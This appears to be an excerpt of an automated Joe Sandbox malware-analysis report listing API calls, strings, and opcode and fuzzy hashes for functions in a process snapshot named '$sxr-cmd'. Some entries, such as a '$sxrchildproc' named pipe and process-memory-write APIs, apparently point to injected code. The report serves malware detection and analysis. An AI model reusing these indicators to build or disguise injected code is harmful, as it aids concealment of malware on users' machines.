Uniqueness
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: CreateDirectoryDriveFullNamePathTypememset
• String ID:
• API String ID: 1397130798-0
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
  • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
  • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
  • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
• _wcsicmp.MSVCRT ref: 00007FF6155025CA
• _wcsicmp.MSVCRT ref: 00007FF6155025E8
• _wcsicmp.MSVCRT ref: 00007FF61550260F
• _wcsicmp.MSVCRT ref: 00007FF615502636
• _wcsicmp.MSVCRT ref: 00007FF615502650
Strings
Similarity
• API ID: _wcsicmp$Heap$AllocProcess
• String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
• API String ID: 3407644289-1668778490
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Similarity
• API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 2516562204-381716982
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00007FF6154FD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD46E
  • Part of subcall function 00007FF6154FD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD485
  • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD4EE
  • Part of subcall function 00007FF6154FD3F0: iswspace.MSVCRT ref: 00007FF6154FD54D
  • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD569
  • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD58C
• iswspace.MSVCRT ref: 00007FF615507EEE
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                      • String ID: A
                                                                                                                      • API String ID: 3731854180-3554254475
                                                                                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                      • Instruction ID: a24af72395027e46d9aefe316b3966f3a18c655a0ed1f4c24dd0030b20d024a3
                                                                                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                      • Instruction Fuzzy Hash: 57A15029A09E8286E6609F61A850279FBA0FF45FB4F548035DA4DC77B5EF3CE845DB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• API String ID: 1580871199-2613899276
• Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
• Instruction ID: 9bff9a7803e188b8e26b487efc76ea668209d9f5887566ba6db609cf89dace5d
• Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
• Instruction Fuzzy Hash: 70514B76A19F8286EB108F25E840679A7F4FB88FA4F455135DA5E87B68DF3CD801C740
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
• Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
• Instruction ID: 48ab0aa29d10d6b7ea7706b37008d1743b859ccdd20a31471c869d38331ccc22
• Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
• Instruction Fuzzy Hash: B8417136A08A45C6E6108F299484379FAA1FB49FB5F558335DA2D937E0CF3DDC498740
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
• String ID: PE
• API String ID: 2941894976-4258593460
• Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction ID: e72075cc2ff0582a7800ca37370e8ed00c2cd56a936f690eb14cc7fcfda09ca3
• Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction Fuzzy Hash: B2419379A08A9186EA208F11E450279FBF0FB89FA0F454230DE5D83BA5DF7CE845CB40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
• API String ID: 2171963597-1213686612
• Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
• Instruction ID: 241303c5758983f69d981ed64eef12adeecb75c0c544caa9441ccd752c9e3ef5
• Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
• Instruction Fuzzy Hash: 31217F32619B4082FB10CB64F55835A73B2F389BA5F904215EA5E4ABA9EF7DC149CF00
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF61551849D,?,?,?,00007FF61551F0C7), ref: 00007FF615500045
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61551F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF615500071
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615500092
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6155000A7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615500148
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615500181
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
• String ID:
• API String ID: 734197835-0
• Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
• Instruction ID: 5a6128d5b1f84a9d5a3abd56e4a14d0421edd286c5cd2576514db6ea48c9698f
• Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
• Instruction Fuzzy Hash: 5461613A90CE9286E7208B25A804379FAA1BB45F68F848136D94EC37B4DF7CEC45C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Enum$Openwcsrchr
• String ID: %s=%s$.$\Shell\Open\Command
• API String ID: 3402383852-1459555574
• Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
• Instruction ID: 28e770eefd48eb5c3401986fe896cc90c8cb28500715102b154cca92d5211f48
• Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
• Instruction Fuzzy Hash: B6A1A46AA08E4282EE109F55D0902BAE7B0EF85FB4F444635DA4E877A5DF7CED41C300
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$wcscmp
• String ID: %s
• API String ID: 243296809-3043279178
• Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
• Instruction ID: 82c8245e6e8133575b7ac79b79dfe2e57c7abffd07cf5c9075108ff8e4ee87ea
• Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
• Instruction Fuzzy Hash: 9EA18226709E8696EB65DF25D8403F9A790FF48FA8F544036CA4EC76A5DF3CEA458300
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$EnvironmentVariable
                                                                                                                      • String ID: DIRCMD
                                                                                                                      • API String ID: 1405722092-1465291664
                                                                                                                      • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                      • Instruction ID: bb5777926a307ba215285f529d2f03b224a12e9f1942d4b3bee329531006ba9f
                                                                                                                      • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                      • Instruction Fuzzy Hash: 49817F72A18FC28AEB20CF74E8802ED77A4FB48B58F104139DA8D97B69DF38D5558704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$wcschr$Process$AllocateFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                      • String ID: FOR$ IF
                                                                                                                      • API String ID: 557945885-2924197646
                                                                                                                      • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                      • Instruction ID: 910eaedead6930c7bd8c2edd1f10ec605fd2b992b87bede32f48d75d85c56c0c
                                                                                                                      • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                      • Instruction Fuzzy Hash: EF517B28F09E4281EE59AF2A9454279A7A1AF85FB4B484236D91ED77F1DF3CEC018300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigit$iswspacewcschr
                                                                                                                      • String ID: )$=,;
                                                                                                                      • API String ID: 1959970872-2167043656
                                                                                                                      • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                      • Instruction ID: 8cb238b7fdf6f808f1cbe866fc196553dcf279ce3481f9a2638e602806178b48
                                                                                                                      • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                      • Instruction Fuzzy Hash: AB418066E08E5696FB648F1D9544379B6A0AF10F75F445032CD5CC25B4EF3CACA18B81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                      • String ID: %04X-%04X$:
                                                                                                                      • API String ID: 930873262-1938371929
                                                                                                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                      • Instruction ID: 38ccec4db8636c086c8e75451ce8fa03ec2a43fc4db8365d9636089a407114ea
                                                                                                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                                                      • Instruction Fuzzy Hash: EF415139A08E42C2EB249B64E4412BAE7A0FB84F74F418136D94DC26E6DF3CD945C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction ID: 7f0b74bb45eec5059da990e160074d66303e6b8c8f52cc8ab941cf5802f062d8
                                                                                                                      • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction Fuzzy Hash: C1417133619B8097E764CFA2E44879AB7B2F389B94F408125DB8D0BB55EF39D164CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                      • API String ID: 3249344982-2616576482
                                                                                                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                      • Instruction ID: 25c29643cd10bd87944ff95a7902b9892a3f36112a78b5a939b306261901abfc
                                                                                                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                      • Instruction Fuzzy Hash: 3B416F76618F4186E7108F11A84437AFAA4FB89FE8F458235DA4D87BA5CF3CD9158B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$iswdigit
                                                                                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                      • API String ID: 2770779731-632268628
                                                                                                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                      • Instruction ID: a8881172c478a724567cf0ce1745b6803f311b699632773467858ef5f8745331
                                                                                                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                      • Instruction Fuzzy Hash: 34313E76A08E56C5E7509F11E450278BBE0FB49F69B698136DA4DC7764EF3CE804C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: 4926955a7591a6564aaa11b3223f02b4951c6af9ffa7b7f8394ee2063b7cdf71
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: 0781F42161E34386FA50ABE79C4C35EABB3EB457A0F4444A5AA4D4BF97FB39C845C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: 75f5719f37d8fdb06d13ef41f00628fd018543a76fd951472ae878f9c677a3aa
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: A381D321A0FB418AFA549BE59849B7922B3A745BB0FD48425DA0D4F797FF3BCC418700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192234081-0
Uniqueness

